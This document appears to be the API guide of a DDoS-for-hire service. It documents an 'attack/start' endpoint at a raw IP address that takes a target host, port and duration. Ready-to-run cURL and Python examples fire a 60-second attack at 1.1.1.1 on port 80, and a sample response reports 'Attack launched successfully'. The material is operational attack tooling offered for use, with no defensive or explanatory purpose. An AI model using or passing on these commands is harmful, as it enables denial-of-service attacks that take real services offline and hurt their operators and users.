> API_USAGE_GUIDE
📡 ENDPOINT
http://152.67.12.174:20312/api/v1/attack/start
🔧 PARAMETERS
  • host (required) - Target IP address
  • port (required) - Target port (1-65535)
  • time (required) - Duration in seconds (10-60)
📋 cURL EXAMPLE
$ curl
curl "http://152.67.12.174:20312/api/v1/attack/start?host=1.1.1.1&port=80&time=60" \
  -H "X-API-Key: YOUR_API_KEY"
🐍 PYTHON EXAMPLE
python
import requests

headers = {"X-API-Key": "YOUR_API_KEY"}
params = {
    "host": "1.1.1.1",
    "port": 80,
    "time": 60
}

response = requests.get(
    "http://152.67.12.174:20312/api/v1/attack/start",
    headers=headers,
    params=params
)

print(response.json())
📤 RESPONSE EXAMPLE
json
{
  "success": true,
  "message": "Attack launched successfully",
  "launchedCount": 1,
  "cooldown_seconds": 65,
  "error": null,
  "retry_after": null
}
⚠️ RATE LIMITS
  • • 10 requests per 60 seconds per IP
  • • Max attack duration: 60 seconds